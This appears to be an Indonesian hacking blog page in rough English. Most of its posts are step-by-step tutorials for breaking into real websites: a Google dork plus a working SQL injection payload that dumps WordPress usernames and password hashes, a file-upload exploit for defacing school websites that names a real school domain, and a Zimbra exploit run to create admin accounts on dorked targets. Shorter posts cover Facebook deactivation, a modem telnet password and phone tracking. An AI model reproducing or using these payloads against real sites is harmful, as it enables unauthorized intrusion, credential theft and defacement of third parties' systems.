Saturday, July 30, 2016

How to deface With WordPress Exploit


How to deface With WordPress Exploit

Cara Deface Dengan Exploit Wordpress For Newbie


How to deface With Wordpress Exploit - This time I will share how
expliot wordpress , it is already long way really, .Here's how:

1. Dork type the following into the Google search box : inurl:"wp-content/plugins/photoracer/viewimg.php?id="
2. Later will come a few web , open one for execution .
3. Add exploits behind url: +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Example : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1 into
www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
4. Well , later going to appear sightings username and password from the web.
Example : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1
5.There, the form of the password is still a salt / MD5 . Please crack first, to MD5 passwords can be cracked here

6. If you already can username and password, you log into the web through : www.site.com/wp-admin/
good luck

Friday, July 29, 2016

How to delete your Facebook account itself

How to delete your Facebook account alone for the time being
Referred to remove a temporary basis is to disable the account up for a while and one day they can be reactivated

Here are the things that happens when you deactivate your Facebook account :
  • People will not be able to see information on your Facebook Timeline
  • People on Facebook will not be able to search for you
  • Some information , such as messages that you send , may still be seen by others
  • Facebook stores information on your account ( for example : friends, photos , interests ) , in case you want to go back to Facebook someday . If you choose to reactivate your account , then the information in your profile still be there when you come back

To deactivate Facebook account for a while , follow the steps below :
1. Login to your Facebook account and press menu on the right top of any Facebook page ( see image below circled in red )
tutorial cara menonaktifkan akun facebook
2. Select the " Settings" or " Settings " ( See image below )
cara menghapus akun facebook untuk sementara
3. Select the " Security " or " Security" in the left column
panduan cara menonaktifkan akun facebook
4. Select " Deactivate your account " or " Deactivate your account "
cara menonaktifkan akun facebook untuk sementara
5. Furthermore, just follow the steps that are required to confirm . Usually it will be given a question sepert Reason exit Required . As for the other question is not mandatory. If you are confident with your answers , please press the " Disable " .

That is all and thank you

How to Deface / Hack School Website


This time I will be to share on how to hack the school website ( tricks rather inconsequential and quality not possible anyway ) , but were not hurt anything . First you prepare the material to hack the school's website . Eittsss targeted remember do not adversely affect the school itself later : v hahaha ! okay immediately chekidot ! ( Click image to enlarge size , if for example not visible )
Material:
1. Notepad (please fill)

Note: Prepare in advance Script



How to Work :

1. Enter one dork to Google
Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?



I chose dork inurl : /html/siswa.php ? , Later will come the web to hack .Turn one of its

2. Okay if already . I choose a website that I found such
http://smpn4-malang.sch.id/html/siswa.php?id=prestasi


3.Exploit with /editor/filemanager/connectors/test.html
for example : http://smpn4-malang.sch.id/editor/filemanager/connectors/test.html then Enter

4. The interface will change



5. In the column Connector change *ASP into *PHP , continue on the Resource Type column change to File


6. Upload file anda yang berbentuk .txt kalo berhasil ada tanda File Uploaded With No Error


Klik Ok

7.After the file has been uploaded . We find our files to exploit /userfiles/file/namafileanda.txt
for example like http://smpn4-malang.sch.id/userfiles/file/jembud.txt


Thursday, July 28, 2016

How to Exploit Zimbra (Get SMTP)

How to Exploit Zimbra (Get SMTP)

Okay meet again with me Uncle Tom ,
Here I teach to share about how to exploit zimbra for smtp , for an explanation with it:



Download Aplication ruby
Exploitd-DB mirror : link

Installation steps and how to use in cmd

Install ruby to finish in program files c: \
Download exploit its db
After downloaded who forgot to extract its files in the program files ruby
ruby - bin ; extract here
Open cmd
ruby run.rb -t http://www.target.com
His command right path
" Cd c : \ ruby \ bin " without the quotation *

To find the target need dork zimbra , ane only give one dork

inurl : "web client login zimbra " For other dork dork please find and develop their own


Step find targets :
  • Go to google.com
  • Enter a dork above was added to google
  • example : http://tangguh.co.id/questions/linux-server-73/customize-zimbra-web-client-login-screen-in-v8-4175450789/
  • download website domain only, http://tangguh.co.id
  • Copy and Paste in cmd who had been given the order ,
  • ruby run.rb mail.tangguh.co.id -t -p -u paypalsecure aa11AA11
  • Then see the results

If there is a successful case of this notice in cmd

[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges


examples of successful image  :




Thanks

How to Change Password Login Telnet Modem ZTE F660

How to Change Password Login Telnet Modem ZTE F660

UNCLETOM  



How to Change Password Login Telnet Modem ZTE F660


How to Change Password Login Telnet Modem ZTE F660 :

Log in to the modem via telnet admin public ip router in cmd
Please login with the default password user is :

User default         : root
Password default : Zte521



If you are logged in, type the following command
 sendcmd 1 DB set TelnetCfg 0 TS_UPwd Passwordbaru


Then type the command
 sendcmd 1 DB save

Now reboot your modem then the default password has been replaced telnet
 reboot


Thanks

Track your Android or Smartphone Missing

Track your Android or Smartphone Missing



Make sure the android already linked to a Google account is still active ( gmail ) , because this tutorial to review the facilities provided by google


With google 's facilities , would certainly help the users , if at any time they lost smartphone .
However , if there is no Google Account connected on your Android , of course, it will not do any good.
NOTE :
Smartphone never connect to the Internet
GPS should be active . And if it is not active ? I explain a little bit in this tutorial Smartphone is turned on

Track your Smartphone or Android with Gmail account is already connected / sign in to Android
First , turn on Android Device Manager . You do this follow these steps
Open Google Settings

Go To Menu Security Android Device Manager

On the menu Security Android Device Manager  
Check on the Allow Remote Lock and Factory Reset as shown below
click Active

Then your Android Device Manager is Active 


after that, go to the Website www.google.com/android/devicemanager,
Then login using your Google Account / gmail is already associated with your Android

If there is a popup that reads "Allow Android Device Manager to use location data?" you click Accept . If it does not appear , skip to the next step alone.

Say Welcome to Android Device Manager


To track the missing Android , you click the GPS icon in the right Ponjok popup

If you forget to turn on GPS Android you will not be able to get the location . However , you can still be me - resetnya by pressing the " Delete " With this plant will set the GPS settings to turn on, so Android can be re-discovered .



If successful, then will appear along with the location information Map Android landslide where you are.
This is the location of my own home android, who want a relationship , please come to my house


Thank You

Comments system

Disqus Shortname